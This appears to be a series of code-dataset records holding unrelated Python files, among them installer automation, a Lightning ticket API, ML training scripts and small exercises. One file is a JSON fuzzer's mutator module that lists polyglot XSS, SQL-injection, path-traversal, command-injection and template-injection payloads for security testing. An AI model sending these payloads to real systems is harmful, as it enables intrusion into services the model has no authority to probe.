address\r\n\t\t\t\t\twizard2.Edit1.type_keys(configSettingsList[3])\r\n\t\t\t\t\ttime.sleep(1)\r\n\t\t\t\tif configSettingsList[4] != \"\":\t#Host header name\r\n\t\t\t\t\twizard2.Edit2.type_keys(configSettingsList[4])\r\n\t\t\t\t\ttime.sleep(1)\r\n\t\t\t\tif configSettingsList[5] != \"\":\t#Query Engine Port\r\n\t\t\t\t\twizard2.Edit5.type_keys(configSettingsList[5])\r\n\t\t\t\t\ttime.sleep(1)\r\n\t\t\t\tif configSettingsList[6] != \"\":\t#PDFService Port\r\n\t\t\t\t\twizard2.Edit3.type_keys(configSettingsList[6])\r\n\t\t\t\t\ttime.sleep(1)\r\n\t\t\t\tif configSettingsList[11] == \"true\": #Reverse Proxy\r\n\t\t\t\t\twizard2.CheckBox.click()\r\n\r\n\t\t\texcept:\r\n\t\t\t\tprint(\"Failed to enter custom settings\")\r\n\t\t\t\traise Exception()\r\n\r\n\t\tpywinauto.application.WindowSpecification(dict(title = 
u\"RC-Reporter - InstallShield Wizard\", class_name = 'MsiDialogCloseClass')).Next.wait(\"exists ready\",10,0.5)\r\n\t\twizard2.Next.wait('ready',5,0.25)\r\n\t\ttime.sleep(0.5)\r\n\t\twizard2.Next.click()\r\n\t\t\r\n\t\t#Wait for the next window to exist\r\n\t\tpywinauto.application.WindowSpecification(dict(title = u\"RC-Reporter - InstallShield Wizard\", class_name = 'MsiDialogCloseClass')).Button2.exists(20,0.5)\r\n\t\tpywinauto.application.WindowSpecification(dict(title = u\"RC-Reporter - InstallShield Wizard\", class_name = 'MsiDialogCloseClass')).Next.wait(\"exists ready\",10,0.5)\r\n\t\t\r\n\t\ttry:\r\n\t\t\tfor i in range(7,10):\t#Checking if there are custom database settings\r\n\t\t\t\tif configSettingsList[i] != \"\":\r\n\t\t\t\t\tprint(\"Entering Custom Settings\")\r\n\t\t\t\t\tbreak\r\n\r\n\t\t\tif configSettingsList[7] != \"\": #Database server\r\n\t\t\t\twizard1.Edit1.type_keys(configSettingsList[7])\r\n\t\t\t\ttime.sleep(1)\r\n\t\t\tif configSettingsList[12] == \"true\": #Windows authentication credentials\r\n\t\t\t\twizard1.radioButton1.click()\r\n\t\t\t\ttime.sleep(1)\r\n\t\t\telse:\r\n\t\t\t\tif configSettingsList[8] != \"\": #Login ID\r\n\t\t\t\t\twizard1.Edit2.type_keys(configSettingsList[8])\r\n\t\t\t\t\ttime.sleep(1)\r\n\t\t\t\tif configSettingsList[9] != \"\": #Password\r\n\t\t\t\t\twizard1.Edit3.type_keys(configSettingsList[9])\r\n\t\t\t\t\ttime.sleep(1)\r\n\r\n\t\t\tif configSettingsList[10] != \"\": #Database name\r\n\t\t\t\twizard1.Edit4.type_keys(configSettingsList[10])\r\n\t\t\t\ttime.sleep(1)\r\n\r\n\t\t\twizard2.Next.wait('ready',5,0.25)\r\n\t\t\ttime.sleep(2)\r\n\t\t\twizard2.Next.click()\r\n\t\t\tpywinauto.application.WindowSpecification(dict(class_name = 'WindowsForms10.Window.8.app.0.141b42a_r6_ad1')).exists(20,0.5)\r\n\t\t\twhile pywinauto.application.WindowSpecification(dict(class_name = 'WindowsForms10.Window.8.app.0.141b42a_r6_ad1')).exists(0.5,0.5) == True:\r\n\t\t\t\ttime.sleep(0.5)\r\n\r\n\t\texcept:\r\n\t\t\tprint(\"Database Authentication Failed\")\r\n\t\t\traise Exception()\r\n\r\n\texcept:\r\n\t\tprint(\"Failed entering configuration settings\")\r\n\t\traise Exception()\r\n\r\n\r\n\tprint(\"Entering login details\")\r\n\r\n\ttry:\r\n\t\tif wizard1.Browse.exists(1,0.5) == True: #Sometimes the previous click dosent do anything (idk why) so this checks to see if the correct window is open\r\n\t\t\twizard1.Next.click()\r\n\t\t\t\r\n\t\tpywinauto.application.WindowSpecification(dict(title = u\"RC-Reporter - InstallShield Wizard\", class_name = 'MsiDialogCloseClass')).Edit1.wait(\"exists ready\",10,0.5)\r\n\t\twizard2.Edit1.wait('ready',5,0.25)\r\n\t\twizard2.set_focus()\r\n\r\n\t\twizard2.Edit1.type_keys(configSettingsList[0])\r\n\t\ttime.sleep(1)\r\n\r\n\t\twizard2.Edit2.type_keys(configSettingsList[1])\r\n\t\ttime.sleep(1)\r\n\r\n\t\twizard2.Edit3.type_keys(configSettingsList[1])\r\n\t\ttime.sleep(1)\r\n\t\twizard2.Next.click()\r\n\r\n\texcept: \r\n\t\tprint(\"Failed entering login info\")\r\n\t\traise Exception()\r\n\r\n\tprint(\"Installing SQL build\")\r\n\r\n\ttry:\r\n\t\tpywinauto.application.WindowSpecification(dict(title = u\"RC-Reporter - InstallShield Wizard\", class_name = 'MsiDialogCloseClass')).Install.wait(\"exists ready\",10,0.5)\r\n\t\ttime.sleep(1)\r\n\t\twizard2.Install.wait('ready',5,0.25)\r\n\t\twizard2.Install.click()\r\n\t\t\r\n\t\t#This if statement checks to see if the trial license window pops up\r\n\t\tif pywinauto.application.WindowSpecification(dict(title = u\"RC-Reporter - InstallShield Wizard\", class_name = 
'#32770')).exists(5,0.5) == True:\r\n\t\t\tapp.connect(title = \"RC-Reporter - InstallShield Wizard\")\r\n\t\t\twizard3 = app['RC-Reporter - InstallShield Wizard2']\r\n\t\t\twizard3.OK.wait('ready',5,0.25)\r\n\t\t\twizard3.OK.click()\r\n\r\n\t\twhile True:\r\n\t\t\tif pywinauto.application.WindowSpecification(dict(title = u\"RC-Reporter - InstallShield Wizard\", class_name = 'MsiDialogCloseClass')).Finish.exists(5,0.5) == True:\r\n\t\t\t\tbreak\r\n\r\n\t\tpywinauto.application.WindowSpecification(dict(title = u\"RC-Reporter - InstallShield Wizard\", class_name = 'MsiDialogCloseClass')).Finish.wait(\"exists ready\",10,0.5)\r\n\t\twizard2.Finish.click()\r\n\texcept:\r\n\t\tprint(\"Failed to install PR build\")\r\n\t\traise Exception()\r\n\r\n\tprint(\"Finished Installing SQL build\")\r\n\r\n\r\n\t######################################################################################################################################\r\n\t'''\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t \r\n\t#This part is for installing the PR build\t\t\t\t\t\t\t\t\t \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t \r\n\t'''\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t \r\n\t######################################################################################################################################\r\n\tif pr == \"\":\r\n\t\treturn\r\n\r\n\telse:\r\n\t\tprint(\"Upgrading\")\r\n\r\n\t\ttry:\r\n\t\t\tapp.start(pr) \r\n\r\n\t\t\tpywinauto.application.WindowSpecification(dict(title = u\"RC-Reporter - InstallShield Wizard\", class_name = '#32770')).wait(\"ready\",15,0.5)\r\n\t\t\twizard4 = app['RC-Reporter - InstallShield Wizard']\r\n\t\t\twizard4.Yes.click()\r\n\r\n\t\t\tpywinauto.application.WindowSpecification(dict(title = u\"Windows Installer\", class_name = '#32770')).wait(\"ready\",15,0.5)\r\n\t\t\tpywinauto.application.WindowSpecification(dict(title = u\"Windows Installer\", class_name = '#32770')).wait_not(\"ready\",15,0.5)\r\n\t\t\t\r\n\t\t\tpywinauto.application.WindowSpecification(dict(title = u\"RC-Reporter - InstallShield Wizard\", class_name = 'MsiDialogCloseClass')).Next.wait(\"exists ready\",30,0.5)\r\n\t\t\tapp.connect(title = \"RC-Reporter - InstallShield Wizard\")\r\n\t\t\twizard5 = app['RC-Reporter - InstallShield Wizard']\r\n\r\n\t\t\twizard5.Next.click()\r\n\t\t\tpywinauto.application.WindowSpecification(dict(title = u\"RC-Reporter - InstallShield Wizard\", class_name = '#32770')).OK.wait(\"exists ready\",30,0.5)\r\n\t\t\twizard5.OK.click()\r\n\r\n\t\t\twizard5.Finish.exists(300,0.5)\r\n\t\t\ttime.sleep(0.5)\r\n\t\t\twizard5.Finish.click()\r\n\t\t\r\n\t\texcept: \r\n\t\t\tprint(\"Failed to install\")\r\n\t\t\traise Exception()\r\n\r\n\t\tprint(\"Finished Installation\")\r\n\t\t\r\n\t\treturn \r\n\r\nif __name__ == \"__main__\":\r\n\tfresh_install_main(pr,sql,configSettingsList)\r\n\r\n","sub_path":"RCRIA git/fresh_install.py","file_name":"fresh_install.py","file_ext":"py","file_size_in_byte":11943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"446748950","text":"import re\nfrom quart import g, jsonify, request\nfrom http import HTTPStatus\n\nfrom lnbits.core.crud import get_user, get_wallet\nfrom lnbits.core.services import create_invoice, check_invoice_status\nfrom lnbits.decorators import api_check_wallet_key, api_validate_post_request\n\nfrom . 
import lnticket_ext\nfrom .crud import (\n    create_ticket,\n    set_ticket_paid,\n    get_ticket,\n    get_tickets,\n    delete_ticket,\n    create_form,\n    update_form,\n    get_form,\n    get_forms,\n    delete_form,\n)\n\n\n# FORMS\n\n\n@lnticket_ext.route(\"/api/v1/forms\", methods=[\"GET\"])\n@api_check_wallet_key(\"invoice\")\nasync def api_forms():\n    wallet_ids = [g.wallet.id]\n\n    if \"all_wallets\" in request.args:\n        wallet_ids = (await get_user(g.wallet.user)).wallet_ids\n\n    return (\n        jsonify([form._asdict() for form in await get_forms(wallet_ids)]),\n        HTTPStatus.OK,\n    )\n\n\n@lnticket_ext.route(\"/api/v1/forms\", methods=[\"POST\"])\n@lnticket_ext.route(\"/api/v1/forms/<form_id>\", methods=[\"PUT\"])\n@api_check_wallet_key(\"invoice\")\n@api_validate_post_request(\n    schema={\n        \"wallet\": {\"type\": \"string\", \"empty\": False, \"required\": True},\n        \"name\": {\"type\": \"string\", \"empty\": False, \"required\": True},\n        \"webhook\": {\"type\": \"string\", \"required\": False},\n        \"description\": {\"type\": \"string\", \"min\": 0, \"required\": True},\n        \"amount\": {\"type\": \"integer\", \"min\": 0, \"required\": True},\n        \"flatrate\": {\"type\": \"integer\", \"required\": True},\n    }\n)\nasync def api_form_create(form_id=None):\n    if form_id:\n        form = await get_form(form_id)\n\n        if not form:\n            return jsonify({\"message\": \"Form does not exist.\"}), HTTPStatus.NOT_FOUND\n\n        if form.wallet != g.wallet.id:\n            return jsonify({\"message\": \"Not your form.\"}), HTTPStatus.FORBIDDEN\n\n        form = await update_form(form_id, **g.data)\n    else:\n        form = await create_form(**g.data)\n    return jsonify(form._asdict()), HTTPStatus.CREATED\n\n\n@lnticket_ext.route(\"/api/v1/forms/<form_id>\", methods=[\"DELETE\"])\n@api_check_wallet_key(\"invoice\")\nasync def api_form_delete(form_id):\n    form = await get_form(form_id)\n\n    if not form:\n        return jsonify({\"message\": \"Form does not exist.\"}), HTTPStatus.NOT_FOUND\n\n    if form.wallet != g.wallet.id:\n        return jsonify({\"message\": \"Not your form.\"}), HTTPStatus.FORBIDDEN\n\n    await delete_form(form_id)\n\n    return \"\", HTTPStatus.NO_CONTENT\n\n\n#########tickets##########\n\n\n@lnticket_ext.route(\"/api/v1/tickets\", methods=[\"GET\"])\n@api_check_wallet_key(\"invoice\")\nasync def api_tickets():\n    wallet_ids = [g.wallet.id]\n\n    if \"all_wallets\" in request.args:\n        wallet_ids = (await get_user(g.wallet.user)).wallet_ids\n\n    return (\n        jsonify([form._asdict() for form in await get_tickets(wallet_ids)]),\n        HTTPStatus.OK,\n    )\n\n\n@lnticket_ext.route(\"/api/v1/tickets/<form_id>\", methods=[\"POST\"])\n@api_validate_post_request(\n    schema={\n        \"form\": {\"type\": \"string\", \"empty\": False, \"required\": True},\n        \"name\": {\"type\": \"string\", \"empty\": False, \"required\": True},\n        \"email\": {\"type\": \"string\", \"empty\": True, \"required\": True},\n        \"ltext\": {\"type\": \"string\", \"empty\": False, \"required\": True},\n        \"sats\": {\"type\": \"integer\", \"min\": 0, \"required\": True},\n    }\n)\nasync def api_ticket_make_ticket(form_id):\n    form = await get_form(form_id)\n    if not form:\n        return jsonify({\"message\": \"LNTicket does not exist.\"}), HTTPStatus.NOT_FOUND\n\n    nwords = len(re.split(r\"\\s+\", g.data[\"ltext\"]))\n    sats = g.data[\"sats\"]\n\n    try:\n        payment_hash, payment_request = await create_invoice(\n            wallet_id=form.wallet,\n            amount=sats,\n            memo=f\"ticket with {nwords} words on {form_id}\",\n            extra={\"tag\": \"lnticket\"},\n        )\n    except Exception as e:\n        return jsonify({\"message\": str(e)}), HTTPStatus.INTERNAL_SERVER_ERROR\n\n    ticket = await create_ticket(\n        
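# the ticket row is keyed by the invoice's payment_hash so it can be looked up when the invoice settles\n        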
payment_hash=payment_hash, wallet=form.wallet, **g.data\n    )\n\n    if not ticket:\n        return (\n            jsonify({\"message\": \"LNTicket could not be fetched.\"}),\n            HTTPStatus.NOT_FOUND,\n        )\n\n    return (\n        jsonify({\"payment_hash\": payment_hash, \"payment_request\": payment_request}),\n        HTTPStatus.OK,\n    )\n\n\n@lnticket_ext.route(\"/api/v1/tickets/<payment_hash>\", methods=[\"GET\"])\nasync def api_ticket_send_ticket(payment_hash):\n    ticket = await get_ticket(payment_hash)\n    try:\n        status = await check_invoice_status(ticket.wallet, payment_hash)\n        is_paid = not status.pending\n    except Exception:\n        return jsonify({\"paid\": False}), HTTPStatus.OK\n\n    if is_paid:\n        wallet = await get_wallet(ticket.wallet)\n        payment = await wallet.get_payment(payment_hash)\n        await payment.set_pending(False)\n        ticket = await set_ticket_paid(payment_hash=payment_hash)\n        return jsonify({\"paid\": True}), HTTPStatus.OK\n\n    return jsonify({\"paid\": False}), HTTPStatus.OK\n\n\n@lnticket_ext.route(\"/api/v1/tickets/<ticket_id>\", methods=[\"DELETE\"])\n@api_check_wallet_key(\"invoice\")\nasync def api_ticket_delete(ticket_id):\n    ticket = await get_ticket(ticket_id)\n\n    if not ticket:\n        return jsonify({\"message\": \"Ticket does not exist.\"}), HTTPStatus.NOT_FOUND\n\n    if ticket.wallet != g.wallet.id:\n        return jsonify({\"message\": \"Not your ticket.\"}), HTTPStatus.FORBIDDEN\n\n    await delete_ticket(ticket_id)\n\n    return \"\", HTTPStatus.NO_CONTENT\n","sub_path":"lnbits/extensions/lnticket/views_api.py","file_name":"views_api.py","file_ext":"py","file_size_in_byte":5442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"185650295","text":"import numpy as np\nimport pandas as pd\n\nfrom KMeans.Common.KMeansEnsemble import KMeansEnsemble\n\n\nclass TwoDimensionalData(KMeansEnsemble):\n    def __init__(\n            self,\n            data_dimension: int,\n            cluster_count: int = 8,\n            ensemble_count: int = 8,\n            rows=1000) -> None:\n        self.rows = rows\n\n        np.random.seed(112)\n        data = np.random.randn(self.rows, data_dimension)\n\n        super().__init__(\n            data=data,\n            data_dimension=data_dimension,\n            cluster_count=cluster_count,\n            ensemble_count=ensemble_count,\n            create_centroids=self.create_centroids_with_zeros)\n\n    @staticmethod\n    def create_centroids_with_zeros(k, d):\n        return np.zeros([k, d], dtype=np.float32)\n\n","sub_path":"KMeans/Python/KMeans/TwoDimensional/TwoDimensionalData.py","file_name":"TwoDimensionalData.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"167276817","text":"from pydub import AudioSegment\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom matplotlib import mlab as mlab\n\n\ncall = AudioSegment.from_file('data/G_&_L_Beverly_100117.mp3', format = 'mp3')\n# Extract left and right channel from the MP3 file\nchan_left = AudioSegment.split_to_mono(call)[0]\nchan_right = AudioSegment.split_to_mono(call)[1]\n\nchan1 = np.frombuffer(chan_left.raw_data, np.int16)\nchan2 = np.frombuffer(chan_right.raw_data, np.int16)\n\nplt.subplot(2, 1, 1)\nplt.plot(chan1)\nplt.subplot(2, 1, 2)\nplt.plot(chan2)\nplt.show()\n\n#~ x = mlab.specgram(chan1)\nplt.specgram(chan2, Fs = 8000)\nplt.show()\n\n","sub_path":"brokers/brokers.py","file_name":"brokers.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"11174811","text":"from tkinter import *\n\n\n\n\n\n\ndef adicionar():\n\n    texto['text'] = 'Palavra: ' + 
caixa_pesquisa.get()\n\n\n# Window\nwindows = Tk()\nwindows.title('Searching In Excel')\nwindows.geometry('400x300+100+50')\n\n# Top menu\nmenu = Menu(windows)\nwindows.config(menu=menu)\n\nAlterarPlanilha = Menu(menu)\nAlterarPlanilha.add_command(label='Planilha 1') # To add more, just duplicate this line\nAlterarPlanilha.add_command(label='Planilha 2')\nmenu.add_cascade(label='Alterar Planilha', menu=AlterarPlanilha)\n\n# Search bar\ncaixa_pesquisa = Entry(windows, font='arial 18')\ncaixa_pesquisa.pack()\n\n\n# Text labels\ntexto = Label(windows, text='...', font='arial 14 bold')\ntexto.pack() # Adds the widget to the window\n\n# Buttons\nbotao_verificar = Button(windows, text='Verificar',font='arial 8 bold', bg='grey',fg='white',command=adicionar)\n#botao_adicionar = Button(windows, text='Adicionar',font='arial 8 bold', bg='grey',fg='white',command=adicionar)\nbotao_verificar.pack() # Adds the button\n#botao_adicionar.pack()\n#botao_verificar.focus() # Focus the input field\n\n# Exit\nwindows.mainloop() # Last statement executed in the window code\n","sub_path":"ProjetosPython/Automation_Bots/SearchInExcel_WithAnki.py","file_name":"SearchInExcel_WithAnki.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"39741633","text":"from alexnet import alex_model\nimport numpy as np\nimport pandas as pd\nimport os\nfrom keras.optimizers import Adam\nfrom keras.callbacks import ModelCheckpoint, TensorBoard, EarlyStopping, ReduceLROnPlateau\n\nfrom sklearn.cross_validation import KFold\n\nNB_CLASS = 3\nDROPOUT_RATE = 0.5\nDATA_FORMAT = 'channels_last'\nbatch_size = 32\nepochs = 100\nnfolds = 5\nrandom_state = 2018\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0,1\"\n\n\ndef get_predict_label(predict):\n    return np.argmax(predict, 1)\n\n\ndef merge_several_folds_mean(data, nfolds):\n    a = np.array(data[0])\n    for i in range(1, nfolds):\n        a += np.array(data[i])\n    a /= nfolds\n    # return a.tolist()\n    return a\n\n\n# def accuracy(y_true, y_predict):\n\n\ndef model_train():\n    print('-'*30)\n    print('Load train data Start...')\n    from data_load import load_train_data, load_train_label, load_test_data\n\n    imgs_train = load_train_data()\n    imgs_train_label = load_train_label()\n    # imgs_train_label = np.vstack(imgs_train_label)\n    from keras.utils import to_categorical\n    \"\"\"\n    to_categorical(y, num_classes=None, dtype='float32')\n    Converts integer labels to one-hot encoding. y is an int array; num_classes is the total number of label classes and must be greater than max(y) (labels start at 0).\n    \"\"\"\n    imgs_train_label = to_categorical(imgs_train_label)\n    print('Load train data End...')\n    # print(imgs_train_label)\n\n    print('Load test data Start...')\n    imgs_test = load_test_data()\n    print('Load test data End...')\n\n    print('-'*30)\n    print('Predicting on test data...')\n    print('-'*30)\n\n    print('-'*30)\n    model = alex_model(NB_CLASS=NB_CLASS,\n                       DROPOUT_RATE=DROPOUT_RATE, DATA_FORMAT=DATA_FORMAT)\n    model.compile(optimizer=Adam(\n        lr=1e-5), loss='categorical_crossentropy', metrics=['categorical_accuracy'])\n    print('Model Compiled')\n\n    model_checkpoint = ModelCheckpoint(\n        'weights.h5', monitor='val_loss', save_best_only=True)\n\n    earlystop = EarlyStopping(monitor='val_loss', patience=20, verbose=0)\n\n    reduce_lr = ReduceLROnPlateau(\n        factor=0.1, patience=10, min_lr=0.00001, verbose=1)\n\n    tensorboard = TensorBoard(log_dir='./logs',  # log directory\n                              histogram_freq=1,  # how often (in epochs) to compute histograms; 0 disables them\n                              batch_size=batch_size,  # how much data to use when computing histograms\n                              write_graph=True,  # whether to store the network graph\n                              write_grads=False,  # whether to visualize gradient histograms\n                              write_images=False,  # whether to visualize parameters\n                              
embeddings_freq=0,\n                              embeddings_layer_names=None,\n                              embeddings_metadata=None)\n\n    print('-'*30)\n    print('Fitting model...')\n    print('-'*30)\n\n    yfull_test = []\n\n    scores = []\n\n    kf = KFold(len(imgs_train), n_folds=nfolds,\n               shuffle=True, random_state=random_state)\n\n    num_fold = 0\n    for train_index, test_index in kf:\n        X_train, X_valid = imgs_train[train_index], imgs_train[test_index]\n        Y_train, Y_valid = imgs_train_label[train_index], imgs_train_label[test_index]\n\n        num_fold += 1\n        print('Start KFold number {} from {}'.format(num_fold, nfolds))\n        print('Split train: ', len(X_train), len(Y_train))\n        print('Split valid: ', len(X_valid), len(Y_valid))\n\n        # train on this fold's split and validate on the held-out fold\n        model.fit(X_train, Y_train, batch_size=batch_size, epochs=epochs, verbose=1, shuffle=True,\n                  validation_data=(X_valid, Y_valid),\n                  callbacks=[model_checkpoint, earlystop, reduce_lr, tensorboard])\n\n        # print('-'*30)\n        # print('Loading saved weights...')\n        # print('-'*30)\n        # model.load_weights('weights.h5')\n\n        # predictions_valid = model.predict(\n        #     X_valid, batch_size=batch_size, verbose=1)\n\n        # Store test predictions\n        test_prediction = model.predict(\n            imgs_test, batch_size=batch_size, verbose=1)\n        yfull_test.append(test_prediction)\n\n    test_res = merge_several_folds_mean(yfull_test, nfolds)\n\n    np.save('predict.npy', test_res)\n    predict = get_predict_label(test_res)\n    result = pd.DataFrame()\n    result['predict'] = predict\n    result.to_csv('result.csv', index=None)\n\n\nif __name__ == '__main__':\n    model_train()\n","sub_path":"train_kfold.py","file_name":"train_kfold.py","file_ext":"py","file_size_in_byte":4354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"367253579","text":"\"\"\"\nThe MIT License (MIT)\n\nCopyright (c) 2016 Daniele Linguaglossa \n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n\"\"\"\nimport random\nimport string\nfrom core.pjf_external_fuzzer import JsonExternalFuzzer\n\nclass JsonMutators(object):\n \"\"\"\n Class that represent all the available mutators based on type\n \"\"\"\n\n def __init__(self, level=6):\n self.level = level\n self.external = JsonExternalFuzzer(fuzzer=\"radamsa\", stdin=True, commandline=\"\")\n self.string_mutator = {\n 0: lambda x: x[::-1],\n 1: lambda x: self.external.execute(self.get_string_polyglot_attack(x)),\n 2: lambda x: \"\",\n 3: lambda x: [x],\n 4: lambda x: False,\n 5: lambda x: {\"param\": self.external.execute(self.get_string_polyglot_attack(x))},\n 6: lambda x: 0,\n }\n\n self.boolean_mutator = {\n 0: lambda x: not x,\n 1: lambda x: str(x),\n 2: lambda x: str(not x),\n 3: lambda x: int(x),\n 4: lambda x: int(not x),\n 5: lambda x: float(x),\n 6: lambda x: float(not x),\n }\n\n self.int_mutator = {\n 0: lambda x: x ^ 0xffffff,\n 1: lambda x: -x,\n 2: lambda x: \"%s\" % x,\n 3: lambda x: x | 0xff,\n 4: lambda x: random.randint(-2147483647, 2147483647),\n 5: lambda x: bool(x),\n 6: lambda x: x | 0xff000000\n }\n\n self.float_mutator = {\n 0: lambda x: float(int(round(x, 0)) ^ 0xffffff),\n 1: lambda x: -x,\n 2: lambda x: \"%s\" % x,\n 3: lambda x: float(int(round(x, 0)) | 0xff),\n 4: lambda x: float(random.randint(-2147483647, 2147483647)*0.1),\n 5: lambda x: bool(round(x, 0)),\n 6: lambda x: float(int(round(x, 0)) | 0xff000000)\n }\n\n self.null_mutator = {\n 0: lambda x: float('nan'),\n 1: lambda x: int(bool(x)),\n 2: lambda x: bool(x),\n 3: lambda x: float('+inf'),\n 4: lambda x: {},\n 5: lambda x: [int(bool(x))],\n 6: lambda x: float('-inf')\n }\n\n self.mutator = {\n str: self.string_mutator,\n bool: self.boolean_mutator,\n int: self.int_mutator,\n float: self.float_mutator,\n type(None): self.null_mutator,\n }\n\n self.polyglot_attacks = {\n 0: \"jaVasCript:/*-/*\\\\u0060/*\\\\\\\\u0060/*'/*\\\"/**/(/* */oNcliCk=alert() )//%%0D%%0A%%0d%%0a//\\\\u003csVg/\\\\u003e\",\n 1: \"SELECT 1,2,IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR\"\n \"(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|\\\"XOR(IF(SUBSTR(@@version,1,1)\"\n \"<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR\\\"*/ FROM some_table WHERE ex = %s\",\n 2: \"/../../../../etc/%s\",\n 3: \"SLEEP(1) /*' or SLEEP(1) or '\\\" or SLEEP(1) or \\\"*/%s\",\n 4: \"\",\n 5: \"%s&sleep 5&id'\\\\\\\"\\\\u00600&sleep 5&id\\\\u0060'\",\n 6: \"..\\\\..\\\\..\\\\..\\\\%s.ini\",\n 7: \"data:text/html,https://%s:a.it@www.\\\\it\",\n 8: \"file:///proc/self/%s\",\n 9: \"\\\\u000d\\\\u00a0BB: %s@mail.it\\\\u000d\\\\u000aLocation: www.google.it\",\n 10: \"||cmd.exe&&id||%s\",\n 11: \"${7*7}a{{%s}}b\",\n 12: \"{{'%s'*7}}\",\n 13: \"\".join(string.printable.strip(\"\\t\\n\\r\\x0b\\x0c\")[random.randint(0, 93)]\n for _ in range(0, random.randint(1, 30))).replace(\"%\", \"\") + \"%s\"\n }\n\n def _get_random(self, obj_type):\n \"\"\"\n Get a random mutator from a list of mutators\n \"\"\"\n return self.mutator[obj_type][random.randint(0, self.level)]\n\n def get_mutator(self, obj, obj_type):\n \"\"\"\n Get a random mutator for the given type\n \"\"\"\n return self._get_random(obj_type)(obj)\n\n def get_string_polyglot_attack(self, obj):\n \"\"\"\n Return a polyglot 
attack containing the original object\n        \"\"\"\n        return self.polyglot_attacks[random.choice(list(self.polyglot_attacks.keys()))] % obj\n\n","sub_path":"core/pjf_mutators.py","file_name":"pjf_mutators.py","file_ext":"py","file_size_in_byte":5451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"491261793","text":"__author__ = 'Alternate'\na = [\"Retention\", 3, None] # None is the same thing as null.\nb = [\"Retention\", 3, None]\n\nif a is not b: # yay for intuitive operators. \"is\" can be used for checking null references\n\tprint(\"wut\") # this prints: \"is not\" compares identity, and a and b are distinct objects even though they compare equal\nelse:\n\tprint(\"derp\")\n\nif a.__eq__(b): # the following two are functionally equivalent: the == operator calls __eq__\n\tprint(\"test\")\n\nif a == b:\n\tprint(\"test line 14\")\n\n# however:\n\nb = a\n\nif a == b:\n\tprint(\"test line 21\") # this prints, because they are now referencing the same object.\n\na = 7\n\nif 0 <= a < 7: # chained comparisons work without an explicit logical and\n\tprint(a)\n\n","sub_path":"src/Tutorials/Section2/Identity Operator.py","file_name":"Identity Operator.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"325105865","text":"N = int(input())\ncnt=1\nwhile True:\n    if N>cnt:\n        N = N - cnt\n        cnt += 1\n    else:\n        break\nif cnt % 2 == 0:\n    print(f'{N}/{cnt - (N - 1)}')\nelse:\n    print(f'{cnt - (N - 1)}/{N}')\n\n\n","sub_path":"BaekJoon/1193.py","file_name":"1193.py","file_ext":"py","file_size_in_byte":203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"622846744","text":"# LeetCode 228. Summary Ranges `E`\n# 1sk | 95% | 21'\n# A~1c11\n\nclass Solution:\n    def summaryRanges(self, nums: List[int]) -> List[str]:\n        ans = []\n        i, j = 0, 0\n        for j in range(0, len(nums)):\n            if j == len(nums)-1 or nums[j+1] - nums[j] > 1:\n                if i == j:\n                    ans.append(str(nums[j]))\n                else:\n                    ans.append(str(nums[i]) + \"->\" + str(nums[j]))\n                i = j = j + 1\n        return ans\n","sub_path":"LeetCode/02/lc228.py","file_name":"lc228.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
